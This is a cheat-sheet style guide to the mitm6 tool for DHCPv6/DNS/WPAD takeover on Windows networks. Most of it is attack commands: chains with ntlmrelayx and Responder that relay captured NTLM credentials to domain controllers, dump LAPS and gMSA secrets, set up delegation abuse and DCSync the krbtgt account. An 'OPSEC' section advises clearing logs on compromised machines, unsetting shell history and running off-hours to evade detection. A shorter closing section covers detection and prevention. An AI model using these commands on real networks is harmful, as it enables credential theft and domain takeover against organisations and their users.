mitm6

Overview

mitm6 exploits the default Windows configuration where IPv6 is enabled but not properly configured. It performs Man-in-the-Middle attacks by responding to DHCPv6 requests to become the default DNS server, then relaying NTLM credentials captured through DNS/WPAD resolution to targets like domain controllers.

Installation

# Install via pip
pip install mitm6

# From source
git clone https://github.com/dirkjanm/mitm6.git
cd mitm6
pip install -r requirements.txt
python setup.py install

# Verify installation
mitm6 --version

How the Attack Works

DHCPv6 Exploitation

• Windows enables IPv6 by default but doesn’t configure it properly
• mitm6 responds to DHCPv6 SOL_MAX_RT messages with rapid DHCPv6 replies
• Attacker becomes the primary DNS server for the IPv6 network
• Works on networks with Windows machines even if DHCPv6 is disabled

WPAD and DNS Takeover

• Victims request WPAD configuration via DNS
• mitm6 responds with attacker-controlled WPAD server
• WPAD forces authentication (NTLM) to proxy requests
• Credentials are captured and relayed to targets

Attack Chain

1. Listen for DHCPv6 traffic
2. Respond to DHCPv6 requests
3. Become default DNS server
4. Intercept WPAD DNS queries
5. Serve malicious WPAD config
6. Capture NTLM authentication
7. Relay to domain controller or other targets

Basic Usage

Simple DNS Takeover

# Listen on interface and takeover DNS
mitm6 -i eth0

# Listen on all interfaces
mitm6

With Verbose Output

# Show detailed attack progress
mitm6 -i eth0 -v

# Very verbose
mitm6 -i eth0 -vv

Specify Network Interface

# Use specific interface
mitm6 -i wlan0

# List available interfaces first
ip link show
ifconfig

Targeting Specific Domains

# Target specific domain for WPAD
mitm6 -i eth0 -d contoso.local

# Multiple domains
mitm6 -i eth0 -d contoso.local -d example.com

# Use DNS suffix list from environment
mitm6 -i eth0 --dns-suffixes contoso.local,example.com

Advanced Options

DHCP Configuration

# Set IPv6 address range for DHCP replies
mitm6 -i eth0 --prefix fd00::/64

# Spoof specific IPv6 address as DNS server
mitm6 -i eth0 --ipv6-address fd00::1

# Disable DHCP replies (DNS only)
mitm6 -i eth0 --no-dhcp

WPAD Server Configuration

# Enable WPAD server (default)
mitm6 -i eth0 --wpad

# Disable WPAD server
mitm6 -i eth0 --no-wpad

# Custom WPAD port
mitm6 -i eth0 --wpad-port 8080

DNS Configuration

# Redirect all DNS queries to attacker
mitm6 -i eth0

# Redirect specific domain
mitm6 -i eth0 -d contoso.local

# Set authoritative DNS server
mitm6 -i eth0 --dns-server 192.168.1.100

Integration with ntlmrelayx

LDAP Relay Attack

# Terminal 1: Run mitm6
mitm6 -i eth0 -d contoso.local

# Terminal 2: Run ntlmrelayx
ntlmrelayx.py -6 -t ldap://dc01.contoso.local -l /tmp/dump

# Create LDAP dump directory
mkdir -p /tmp/dump

LDAP + LDAPS

# Relay to both LDAP and LDAPS
mitm6 -i eth0 -d contoso.local &
ntlmrelayx.py -6 -t ldap://dc01.contoso.local -t ldaps://dc01.contoso.local

Attack Chains

Credential Relay with ntlmrelayx

# Setup relay before starting mitm6
ntlmrelayx.py -6 -t ldap://dc01.contoso.local -w /tmp/output &

# Start DHCPv6/DNS takeover
mitm6 -i eth0 -d contoso.local

# Monitor for LDAP connections and NTLM relay
tail -f /tmp/output

Resource-Based Constrained Delegation (RBCD) Attack

# Dump LDAP and configure RBCD automatically
ntlmrelayx.py -6 -t ldap://dc01.contoso.local \
  --dump-laps \
  --dump-gmsa \
  -w /tmp/delegation_output

# mitm6 relays credentials to LDAP
mitm6 -i eth0 -d contoso.local

DCSync Attack via Relay

# Relay to DC with DCSync attack
ntlmrelayx.py -6 -t ldap://dc01.contoso.local \
  --dcsync-user CONTOSO\\krbtgt

mitm6 -i eth0 -d contoso.local

Integration with Responder

Combined Attack

# Terminal 1: Run Responder (captures NTLM)
responder -i eth0 -A

# Terminal 2: Run mitm6 (DHCPv6/DNS takeover)
mitm6 -i eth0

# Terminal 3: Monitor for credentials
tail -f /tmp/responder-logs.txt

Responder + ntlmrelayx

# Run Responder in listening mode
responder -i eth0 -I

# Run mitm6 in another terminal
mitm6 -i eth0 -d contoso.local

# Run ntlmrelayx to relay captured credentials
ntlmrelayx.py -t 192.168.1.100

OPSEC Considerations

Stealth

# Use correct domain names to appear legitimate
mitm6 -i eth0 -d contoso.local

# Avoid ARP spoofing (mitm6 uses DHCPv6 instead)
# Less noisy than traditional MITM tools

# Use IPv6 - often overlooked and unmonitored
# Deploy on network segment with IPv6 traffic

Timing

# Run during off-hours to minimize detection
# Deploy for limited duration (minutes, not hours)

# Monitor for repeated failed NTLM attempts
# May indicate detection/alerting

Detection Evasion

• Use legitimate-looking WPAD configurations
• Avoid suspicious proxy settings in WPAD PAC
• Keep mitm6 process running only while needed
• Clean logs from compromised machines
• Remove IPv6 routes after successful relay

Logging Avoidance

# Disable bash history
unset HISTFILE

# Run commands directly without logging
mitm6 -i eth0 2>/dev/null

# Use in-memory execution if possible
# Avoid writing to disk

Detection and Defense

Network-Level Detection

# Monitor for suspicious DHCPv6 activity
tcpdump -i eth0 'icmp6 and (ip6[40] == 1 or ip6[40] == 2)'

# Watch for rapid DHCPv6 replies
tcpdump -i eth0 'udp port 546 or udp port 547'

# Detect multiple DHCPv6 servers
# Alert on unusual IPv6 prefix advertisements

Windows Event Logs

• Event ID 6016 (DHCP Server): Unusual DHCP activity
• Event ID 1202 (DNS): Unexpected DNS server changes
• Event ID 4648 (Logon): Failed NTLM relays
• Event ID 5152 (Windows Firewall): IPv6 rule violations

DNS Monitoring

# Monitor DNS query patterns
# Alert on unexpected WPAD queries
# Watch for DNS resolution to unusual IPs

Prevention

# Disable IPv6 on non-IPv6 networks
netsh int ipv6 set state disabled

# Monitor DHCPv6 with DHCP snooping
# Implement DHCP authentication

# Set DNS server statically (not via DHCP)
netsh interface ip set dns static

# Monitor for WPAD requests
# Block or control WPAD via GPO

DHCP Snooping Configuration

# Enable DHCP snooping on switch
ip dhcp snooping
ip dhcp snooping vlan 1,100-200

# Trust uplink ports
ip dhcp snooping trust

# Log suspicious activity
ip dhcp snooping information option

Windows Defender Mitigations

• Enable Attack Surface Reduction (ASR) rules
• Block Office macros from creating child processes
• Restrict Office applications from writing data
• Monitor and block suspicious WPAD behavior

Troubleshooting

mitm6 Not Capturing Traffic

# Verify IPv6 is enabled on network
ip -6 route show

# Check if DHCPv6 is active
tcpdump -i eth0 'udp port 546'

# Ensure running with proper privileges
sudo mitm6 -i eth0

# Check interface is properly up
ip link show

No NTLM Relay

# Verify ntlmrelayx is running
ps aux | grep ntlmrelayx

# Check target is reachable
ping -6 dc01.contoso.local

# Verify domain name is correct
nslookup -type=A contoso.local

Detection/Blocking

# Check for network blocking
traceroute -6 target

# Verify no IPv6 filtering
ip6tables -L

# Test WPAD separately
curl -i http://wpad.contoso.local/wpad.dat

References

• mitm6 GitHub: https://github.com/dirkjanm/mitm6
• ntlmrelayx Documentation
• IPv6 Addressing and DHCP
• WPAD Exploitation Techniques